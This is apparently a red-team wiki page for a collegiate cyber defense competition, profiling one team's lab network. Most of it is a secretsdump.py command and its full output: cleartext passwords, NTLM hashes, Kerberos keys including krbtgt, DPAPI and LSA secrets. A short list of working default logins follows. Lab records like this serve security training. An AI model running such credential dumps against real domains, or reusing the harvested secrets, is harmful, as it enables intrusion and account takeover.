Team 9 Wiki Page

Signup Login
Team Information
Team Team 5 logo
Number
Team 9
Name
Team 5
IP Range
33.96.50.0/24
Domain
team9.isucdc.com
Current Place
4th
Red Teamer(s)
None
Flag Status
Blue Flags
AD C:\Windows\System32\ WWW /etc/ LP C:\Windows\System32\ WMS /etc/ DB /etc/ WWW admin_flag
Red Flags
AD C:\Users\Administrator\ WWW /root/ LP C:\Users\Administrator\ WMS /root/ DB /root/ DB New Table Deface the website
Service Status
AD LDAP
AD RDP
WWW HTTP
WWW SSH
LP RDP
LP SMB
WMS HTTP
WMS SSH
DB SSH
DB SQL
Nmap
./secretsdump.py darren.williams@ad.team9.isucdc.com
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

Administrator:CLEARTEXT:DownIn0hio,Sw@gLikeOhio
christy.davis:CLEARTEXT:zux928dux
jacqueline.elliott:CLEARTEXT:jiw182bin
jennifer.freeman:CLEARTEXT:rar102qat
anna.pugh:CLEARTEXT:jif637wuf
craig.brown:CLEARTEXT:gak404duc
travis.hebert:CLEARTEXT:jih566poy
david.bailey:CLEARTEXT:qul486nom
scott.avila:CLEARTEXT:coh964qul
joseph.smith:CLEARTEXT:jex632nig
sandra.henderson:CLEARTEXT:ROCK123
darren.williams:CLEARTEXT:blues22
allison.hamilton:CLEARTEXT:tiny85
lori.petersen:CLEARTEXT:ricale
john.leguizamo:CLEARTEXT:lordoftheflame
team9.isucdc.com\smb:CLEARTEXT:YoMamaSoEXFAT69@


Password:
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x7e45e0798489088ad80b1d0049e8083a
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:6aa15b3d14492d3fa4aa7c5e9cdc0e6a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
TEAM9\AD$:aes256-cts-hmac-sha1-96:6e33b24b3cc0d95f335d9207ac965999eaed346358f618c24595f6b9f98ec127
TEAM9\AD$:aes128-cts-hmac-sha1-96:c98cc1e72492b1aef39e79de10f93a63
TEAM9\AD$:des-cbc-md5:5e2c9bb5c292dad6
TEAM9\AD$:plain_password_hex:3c002f0030003c002e003f003900760027004a005100480054004f00770027002e005f007500500029004900660040002e003a007a005e00410071002c002f0040005e0027004a0020003d00350069004a002a004900200041002900650028003900680047004d0072002b0024005f0055003800700024006500380076002f0068002e00440022005a007a0074004d005d002b004b005c004e00250056003300370045005d0043002a0045006b005700710028003a003f003300280075005e0068005a006f00560067004b004a0027006c0020004200380051005900400038002f002a006d004a005100380060006e00
TEAM9\AD$:aad3b435b51404eeaad3b435b51404ee:7239ebcccae3e1ac4d0f9728fed2e56b:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x8ed6b6a29c81f18ab63340d9ec9e74be90c8703b
dpapi_userkey:0x26e5f4d6af3f16261425d2157a6f57d28817c6e8
[*] G$MSRADIUSPRIVKEY 
 0000   90 25 E3 EA 1F F1 2C 48  8C 79 20 FF B0 1B 6C 69   .%....,H.y ...li
 0010   75 01 86 05 02 D3 88 85  18 10 BD 82 3E 7A 75 7A   u...........>zuz
 0020   F2 32 95 19 E6 93 7E A9  09 6C 68 3F 10 EF 85 B1   .2....~..lh?....
 0030   C7 BE 7E EC EC 4B 8A 0E  7B DD 2A 93 AE E6 92 E1   ..~..K..{.*.....
 0040   6E B4 43 95 1E 0A C7 D1  69 7B AF DE 29 65 BC 2B   n.C.....i{..)e.+
 0050   61 9D A3 3C 5E 97 D7 F6  F2 61 40 88 4E 30 17 71   a..<^....a@.N0.q
 0060   04 BF C0 7D 6A 5B 05 76  00 0C EF 07 80 AB AA 8D   ...}j[.v........
 0070   A6 B3 9D DE 36 D7 50 8D  40 BE D9 28 6B 93 A2 C7   ....6.P.@..(k...
 0080   A6 44 D0 81 26 58 AA C9  1F C4 13 9E CB 44 61 F0   .D..&X.......Da.
 0090   6F C4 1C 15 68 23 20 F2  F2 09 C8 56 0C E6 F4 C9   o...h# ....V....
 00a0   BF 88 89 F8 F6 DD 91 9F  15 DB AF 47 4D 3A CB D0   ...........GM:..
 00b0   76 EC 7D B6 F4 8B BA 1B  8A 71 0E 0D C7 61 28 9F   v.}......q...a(.
 00c0   DB 2E F6 C1 53 25 F3 4C  59 92 8E 60 70 99 09 12   ....S%.LY..`p...
 00d0   B7 48 D1 C8 AB CD 9C 25  62 2C C5 D0 7C D7 8E 56   .H.....%b,..|..V
 00e0   43 A3 3F 6F 42 DE 19 F2  2C 37 0A D0 C1 C1 C9 96   C.?oB...,7......
 00f0   3C A2 52 48 41 48 DB 74  40 C0 96 04 10 52 92 54   <.RHAH.t@....R.T
G$MSRADIUSPRIVKEY:9025e3ea1ff12c488c7920ffb01b6c697501860502d388851810bd823e7a757af2329519e6937ea9096c683f10ef85b1c7be7eecec4b8a0e7bdd2a93aee692e16eb443951e0ac7d1697bafde2965bc2b619da33c5e97d7f6f26140884e30177104bfc07d6a5b0576000cef0780abaa8da6b39dde36d7508d40bed9286b93a2c7a644d0812658aac91fc4139ecb4461f06fc41c15682320f2f209c8560ce6f4c9bf8889f8f6dd919f15dbaf474d3acbd076ec7db6f48bba1b8a710e0dc761289fdb2ef6c15325f34c59928e6070990912b748d1c8abcd9c25622cc5d07cd78e5643a33f6f42de19f22c370ad0c1c1c9963ca252484148db7440c0960410529254
[*] NL$KM 
 0000   92 CE B4 C9 EF F9 5A B3  13 D1 B6 43 DD FE 5C CB   ......Z....C..\.
 0010   08 5F 31 8D ED 24 51 56  1C AE 8B 35 61 CB EE A8   ._1..$QV...5a...
 0020   3C 0A 50 B6 2F C4 80 B7  70 BB 43 13 AD A1 01 30   <.P./...p.C....0
 0030   37 25 5C F5 79 DA E0 69  54 DB 61 FC 6F 57 C2 61   7%\.y..iT.a.oW.a
NL$KM:92ceb4c9eff95ab313d1b643ddfe5ccb085f318ded2451561cae8b3561cbeea83c0a50b62fc480b770bb4313ada1013037255cf579dae06954db61fc6f57c261
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:95658eb39230f23b50a6f81d9c50d1a1:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:04c698bda7e8660f03f931251aab23fc:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
cdc:1002:aad3b435b51404eeaad3b435b51404ee:6aa15b3d14492d3fa4aa7c5e9cdc0e6a:::
christy.davis:1110:aad3b435b51404eeaad3b435b51404ee:5421cacf8dea37c70e1ac0fb98267b4a:::
jacqueline.elliott:1111:aad3b435b51404eeaad3b435b51404ee:f0f37aaf2e6fd5874e39fcb31fab5645:::
jennifer.freeman:1112:aad3b435b51404eeaad3b435b51404ee:7e5bd03622c285474bb0500bf3eac902:::
anna.pugh:1113:aad3b435b51404eeaad3b435b51404ee:6ba9002a789fbdbc081247f3dd61ebed:::
craig.brown:1114:aad3b435b51404eeaad3b435b51404ee:87cdacba8227e80f31a8834c8826aa1a:::
travis.hebert:1115:aad3b435b51404eeaad3b435b51404ee:269aac09f6fbb9bc0718c84bee554186:::
david.bailey:1116:aad3b435b51404eeaad3b435b51404ee:7dfe79cd404acc3ff425c8b2daf87618:::
scott.avila:1117:aad3b435b51404eeaad3b435b51404ee:0bd87f920dfcd29d0107a2466d262cec:::
joseph.smith:1118:aad3b435b51404eeaad3b435b51404ee:ef19522af17e93ca216b91cb61e48455:::
sandra.henderson:1119:aad3b435b51404eeaad3b435b51404ee:888bdb846c6ced6d86ede64c52038bb1:::
darren.williams:1120:aad3b435b51404eeaad3b435b51404ee:1d4e5459c4b1e83948a5e500d3457a51:::
allison.hamilton:1121:aad3b435b51404eeaad3b435b51404ee:dc6805f77b07f33e2bd1a4f6c1943339:::
lori.petersen:1122:aad3b435b51404eeaad3b435b51404ee:639c22b12e5c5664d3290241435f6088:::
john.leguizamo:1123:aad3b435b51404eeaad3b435b51404ee:b3d45fcfc4ca6b0ed8180e280b470a20:::
team9.isucdc.com\smb:1130:aad3b435b51404eeaad3b435b51404ee:d6d2aebeefed534125b7a6b9950dd51c:::
AD$:1003:aad3b435b51404eeaad3b435b51404ee:7239ebcccae3e1ac4d0f9728fed2e56b:::
LP$:1124:aad3b435b51404eeaad3b435b51404ee:43ca513b93ac77435d59ce0ae415fb31:::
DB$:1125:aad3b435b51404eeaad3b435b51404ee:4a5326ceb7d02b3b1bb599bc614cebcd:::
WWW$:1126:aad3b435b51404eeaad3b435b51404ee:ae807c3caa498914d2e2bc263dee8b17:::
WMS$:1127:aad3b435b51404eeaad3b435b51404ee:eeb1b1ebb969c1015020ecbcfa88c6ed:::
ELASTIC$:1128:aad3b435b51404eeaad3b435b51404ee:f0c96b46316f7a5ec807396f86f9933c:::
N8N$:1129:aad3b435b51404eeaad3b435b51404ee:1b4f70dd4a81b52bbd3e70afb47cee87:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:0a3c78bf289b594e4fdace97e4684dc287c6754baec8526328c763ae35770cea
Administrator:aes128-cts-hmac-sha1-96:b4f268e43cd029583566e27dd8f78a3d
Administrator:des-cbc-md5:fb497a518cd08f58
krbtgt:aes256-cts-hmac-sha1-96:30e75b10579532e9c5525e97cad33f7bef6262c4250e873ef7f2ce11444cfb5e
krbtgt:aes128-cts-hmac-sha1-96:604e0ccbe91125a71579cf3879a7ecf4
krbtgt:des-cbc-md5:bfda01977034ecb3
christy.davis:aes256-cts-hmac-sha1-96:55f715f36efde7c1c27b08c14531b829a310973969bf37c5cd0d2167054e13b1
christy.davis:aes128-cts-hmac-sha1-96:cefd2231f195129306b824befb1d35fb
christy.davis:des-cbc-md5:64b54a7302d513b3
jacqueline.elliott:aes256-cts-hmac-sha1-96:0971e4b66b974f4e1c97c62770517f121de19e1117067056614fabc8a59e5223
jacqueline.elliott:aes128-cts-hmac-sha1-96:a5fd9e7b674344f6c5c6d8407840f160
jacqueline.elliott:des-cbc-md5:9d5e7c62dc347325
jennifer.freeman:aes256-cts-hmac-sha1-96:b3c8b6acc7ee378d05b7279c3d00fa372c34f9d7ebb2e9799b4547df0d697e9e
jennifer.freeman:aes128-cts-hmac-sha1-96:e6c37a2336cf3f9d55d3f26e7ff2b090
jennifer.freeman:des-cbc-md5:071fa8c4eae6bcf8
anna.pugh:aes256-cts-hmac-sha1-96:0ec0ef8afb63b62d32d492aac2df671ee3613fc2dae18de345d4d58c3302235d
anna.pugh:aes128-cts-hmac-sha1-96:973c5cefc4899071775003e67d4e637e
anna.pugh:des-cbc-md5:4a0e2937e61cbcb6
craig.brown:aes256-cts-hmac-sha1-96:816d97dc604595af5f2ef707c8f7226c0f8c01aea0505a269abb3e6c4b7fcacc
craig.brown:aes128-cts-hmac-sha1-96:3578afabd3b7d66ba9bb0363a6ba1939
craig.brown:des-cbc-md5:1f1a46c10273fb15
travis.hebert:aes256-cts-hmac-sha1-96:651e1ddded55c6f38e8e04194896cfad1ae25e22cac3795511a4df152d6624b6
travis.hebert:aes128-cts-hmac-sha1-96:cbb0c752291ffc27a4b01777d48c74b9
travis.hebert:des-cbc-md5:e9abb061519ddf32
david.bailey:aes256-cts-hmac-sha1-96:48e609d1e746cff2b479491294e4cb8e0e4a0e66e2bba75159a3a0e860d0e062
david.bailey:aes128-cts-hmac-sha1-96:814da7d2701a3d0ddcdcc153623a8db9
david.bailey:des-cbc-md5:d086974329e5c423
scott.avila:aes256-cts-hmac-sha1-96:29ae24355bee78b6781f3a1443fe257c68ffe47630f5c6f045acef06b06d7deb
scott.avila:aes128-cts-hmac-sha1-96:10eb954fde68c7883b7da85e706eb6aa
scott.avila:des-cbc-md5:a437ea32f10161ce
joseph.smith:aes256-cts-hmac-sha1-96:a753c189b8094101342f73859cc95e94b9e9a8ac8e0ad947ade7ae2adc1acea6
joseph.smith:aes128-cts-hmac-sha1-96:eac4d91e207d7cf82f4f315a9f919df5
joseph.smith:des-cbc-md5:7fabe668ea5102c1
sandra.henderson:aes256-cts-hmac-sha1-96:5aaec1c7cf5c9478d0362e90a6df40a0fc3b80ad9482134bcbc6e5efe99edde8
sandra.henderson:aes128-cts-hmac-sha1-96:14235dbe88453a67a95ca15ae081a595
sandra.henderson:des-cbc-md5:58dfec6d194f1ab3
darren.williams:aes256-cts-hmac-sha1-96:bfc601e23e43cbcb03ec279fcaa5a1125ab2dc3619a7b240873d763192876f8f
darren.williams:aes128-cts-hmac-sha1-96:ed8c0d0e8757b94fd18598a5c0723184
darren.williams:des-cbc-md5:074aad646b0768bc
allison.hamilton:aes256-cts-hmac-sha1-96:78de9b68805f4d1bd72eb5ee883e08682e556386041e49a713cdc76f0b92a6ab
allison.hamilton:aes128-cts-hmac-sha1-96:54f917de1ce0babe46245c04f4f5f0cd
allison.hamilton:des-cbc-md5:97c2b0ecf41a980d
lori.petersen:aes256-cts-hmac-sha1-96:bc4aa089e3585abb546260b035e18f254af7569c70cc05f0f3c32643558c8205
lori.petersen:aes128-cts-hmac-sha1-96:394c4cfd3a38232d258f4aae6a2c39db
lori.petersen:des-cbc-md5:91ea2c988ffd0b08
john.leguizamo:aes256-cts-hmac-sha1-96:f26754df718af3cf7e71066f1aad6e37a8d36a12d3c95af5a9a2ffa15b852828
john.leguizamo:aes128-cts-hmac-sha1-96:c67ff2441866fdb5bd301203b8dd22c8
john.leguizamo:des-cbc-md5:7907104fd6ba7cdf
team9.isucdc.com\smb:aes256-cts-hmac-sha1-96:75d31a8bb895247889f0c7090ef148d6624c5fd219a792bf4a12ccf9a2969797
team9.isucdc.com\smb:aes128-cts-hmac-sha1-96:7f493aae53b819390efa861b7021c279
team9.isucdc.com\smb:des-cbc-md5:92ce4943133b2001
AD$:aes256-cts-hmac-sha1-96:6e33b24b3cc0d95f335d9207ac965999eaed346358f618c24595f6b9f98ec127
AD$:aes128-cts-hmac-sha1-96:c98cc1e72492b1aef39e79de10f93a63
AD$:des-cbc-md5:5e2c9bb5c292dad6
LP$:aes256-cts-hmac-sha1-96:001ed54e44a6448becac3fb84881145f0085ea16ed753f2a55d5119563186e84
LP$:aes128-cts-hmac-sha1-96:6449f58fc8c202d13c13d97a643ad6b3
LP$:des-cbc-md5:1fcb10d63e2cfb4a
DB$:aes256-cts-hmac-sha1-96:bd802fad18421516db9d5c363102a112bedad13de2741c2c64fcb98285950690
DB$:aes128-cts-hmac-sha1-96:27082566c3d170956e377ee5b7178168
DB$:des-cbc-md5:10bf6d7fb5bfa258
WWW$:aes256-cts-hmac-sha1-96:d502fd3ba8a098f220bd8df1e3d5ea24194290692787e62db7bb11144d97db58
WWW$:aes128-cts-hmac-sha1-96:0b4e9d378f14d415cf6db68d78dd0ccf
WWW$:des-cbc-md5:31f47a83aed3b3df
WMS$:aes256-cts-hmac-sha1-96:abaede9bde81162e45b7c4bac748185d3d273811aeb17e283538f3ef2511ccb9
WMS$:aes128-cts-hmac-sha1-96:60fade1e948a8af6af347909a4cada24
WMS$:des-cbc-md5:1a9b43f49d94756e
ELASTIC$:aes256-cts-hmac-sha1-96:07aba93900d134af01f63eeba012b548c08fe7dd3a09617987ccd13df617d9e0
ELASTIC$:aes128-cts-hmac-sha1-96:709fa491cc02a720576c8519d0f84316
ELASTIC$:des-cbc-md5:0df7b3a2fb107629
N8N$:aes256-cts-hmac-sha1-96:40f3744270b059bffd430393c00ebec59be7b721df24158332d00e9e6f6401c1
N8N$:aes128-cts-hmac-sha1-96:a6233096077c9bc79f70d0c0f1893c30
N8N$:des-cbc-md5:8f9d0bea9e68a2a8
[*] ClearText passwords grabbed
Administrator:CLEARTEXT:DownIn0hio,Sw@gLikeOhio
krbtgt:CLEARTEXT:0x23b301bb5853699df6a387cb370b17c5debb1b0c352d9129832f647175ad5a18968f598b3297e7760a56ae502f817563c0848e1db98ab9dbc2a4547ff1e35b55fd94da2e5bb3253537e088da9446363094f265e0ec1d48e955cbcf2ef8b716e28332949a0becc0e2f3d80a72a9570b34345ce53f202d481564dacbf4f49bf1d27757a56d3038eb2b7f80a2324ab44fb621ab5fb780e75154e78cf0b81d3cfe7a1011681ae1363af039c842d9b5281b8d5b6fa9882762063b2c5407254acb0372df5c7378ff95ad7d052f82f97001110e305f1de15cb0503635e7d9f4bdc1014f524f35bbb0ce2dbb820ec0bec58fd1930146d1223d8a0bc66bf68961e570de593b736a36b392995e86f7ed3401d0787c0d8707bd8e5f7d0f23502c45fe74eadfc9621f7de5ef1d046ddd2746cb589446d7b924c86a9285f9297873965e21afa97bdb7af40bb70a8518f24ac23e7c941523d0645807a3ba5a91a67bc4360277e8efa05061ca3034f92a90c4f8aa0bb4b8cd4ea3527c957c928ffbcff6dc3b7f95f18b5428c90b670122353350073f7ea181906c64de761f842c2b127fbd12de3af3391cfded8e203c20545ebb46275559abd14c181de434c7ee93d4b220209a2aad0e0dd824d146dfeec8b32e4fd40f297f27efa6534d3de38168193be9dc605a28608022e80e57f96fdae3777aa8576e4912868e22774de8d72f4aa182bfb351
christy.davis:CLEARTEXT:zux928dux
jacqueline.elliott:CLEARTEXT:jiw182bin
jennifer.freeman:CLEARTEXT:rar102qat
anna.pugh:CLEARTEXT:jif637wuf
craig.brown:CLEARTEXT:gak404duc
travis.hebert:CLEARTEXT:jih566poy
david.bailey:CLEARTEXT:qul486nom
scott.avila:CLEARTEXT:coh964qul
joseph.smith:CLEARTEXT:jex632nig
sandra.henderson:CLEARTEXT:ROCK123
darren.williams:CLEARTEXT:blues22
allison.hamilton:CLEARTEXT:tiny85
lori.petersen:CLEARTEXT:ricale
john.leguizamo:CLEARTEXT:lordoftheflame
team9.isucdc.com\smb:CLEARTEXT:YoMamaSoEXFAT69@
AD$:CLEARTEXT:LP$:CLEARTEXT:0xeabdf8e7f6a12cf358b1c4f1c245278cbfb59ea680eeb1b5c2eee3bda795237f4be2b023679fd8757f0e69e0d94aeb2d6d6398018214dfbbf4b8f78802932c5dedfd1e618722c535793146feb231f47f28b3364f5f4ddf55eff01dfa99f11622167457775e0aeb92a51095defba7f6f0bb129a6c0ec5b6c4082ab0c0af6daa27bafcf16b85522de3446051598c3533dd797b88c587df34d9b3ed0491790999f4e8ace0bfe44b1ee2d55bfbdca76f6e7dab860a7d7c178bfdb68798ebffe2bfc81e7e3a2b5deb1f29438447784338aeaf95b960ba38e00151175bb6cee4422e4c3491c7f9d8c3e256be9a120fd369e685
DB$:CLEARTEXT:Vx#F]%C1bS~CO.
WWW$:CLEARTEXT:P*V54SgLnEZyIyN+IYK1WbeN#[\MiK3^z=^9I#bv2kn6uA+O4+;7FkVoP),c#z8.z9.oPYKpvw=bZ=N.h-XuCI3.0\;abk[gJ+hFw/7:qI6,.P&OFR:Qr3q8
WMS$:CLEARTEXT:cfp2w?41oYS:&#z)I?ELASTIC$:CLEARTEXT:mawYto]y[U&vM,tpNLBIsLW@ToGf#Q1aq2xN.dQ@FwzKLSVrtVH7[kiBp?5=uo%0bJ\C.dT*:wi%h@G%sfJT(GpXYBSzHzVQ[yxq6eB%&&)^EAAu4#ybwg+n
N8N$:CLEARTEXT:2wcUAj0[wN\vx5E%H*2p2UOfnVS/Qq,X%CCx]BO)OBto&32)]]oHYBR;WG;+5#b>2z-fF(x@DOW((C18W\l%F&N)lWsapCwuZKShX>gPvIHRiTh1nKI-G>l@





Notable Vulnerabilities
Default creds:
OK   team=9   host=wms.team9.isucdc.com          user=darren.williams password=blues22 reason=ok <- User is domain admin
OK   team=9   host=wms.team9.isucdc.com          user=allison.hamilton password=tiny85 reason=ok
OK   team=9   host=wms.team9.isucdc.com          user=lori.petersen password=ricale reason=ok
Notable Defenses
Add content here...
Team Spirit Issues
Add content here...